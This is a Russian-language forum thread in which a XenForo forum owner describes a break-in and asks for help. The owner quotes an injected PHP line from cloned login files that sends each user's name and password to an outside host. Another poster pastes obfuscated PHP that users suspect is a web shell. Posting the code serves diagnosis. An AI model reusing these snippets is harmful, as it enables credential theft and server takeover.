XF 1.5 Пишу от того, что уже ничего не изменить.

Статус
В этой теме нельзя размещать новые ответы.

jolygolfeed

Проверенные
Реакции
231
Баллы
5,545
Появляется файл в user.php создает файл usar.php user2.php.
Там клон файла user.php только в строчке где человек вводит пароль добавили эту строку:
$dadayaaaa=str_replace(" ","",'htt p : // yo utu be- dow nlo ade r. r u');file_get_contents($dadayaaaa.'/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1'); $authentication = $this->getUserAuthenticationObjectByUserId($user['user_id']); if (!$authentication || !$authentication->authenticate($user['user_id'], $password))

Кроме ксена, что на хостинге или серваке?
Ничего.

Кроме ксена, что на хостинге или серваке?
2 года держу только отдельный хостинг с ксеной, такое было, пришлось все переустановить почистить с бд вместе. Темы и пользователей перенес, все обновил.

Хостиг или сервер?
Вообще, если бы избавились, то просто так ничего не появилось бы, или на хостинге есть уязвимость, или ещё что-то.
Можем перейти в лс? там будет много информации

Отписал Администратору.Постараемся решить, уже эффект безнадежности чувствую.

Либо хостинг так делает, что бы меня вытурить, либо новая ксен дырявая.

либо новая ксен дырявая.
Серъёзное заявленьице... но пустое, при таком раскладе, треск стоял бы, а так только ваш форум ломают... дополнение скорей всего какое тостоит

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];

Смайлики :D

Собственно вот.
шелл?

Со штормами никому связываться не советую. Я связан с Л2 серверами, и на профильных форумах за 3 года что только не читал про них. Был факт и не 1, что они воровали сборки людей с размещенных у них. 3 года назад это была хорошая контора, а потом упала ниже плинтуса по всем показателям.

• Мне нравится
Реакции: Hope
Статус
В этой теме нельзя размещать новые ответы.
Современный облачный хостинг провайдер | Aéza
Назад
Сверху Снизу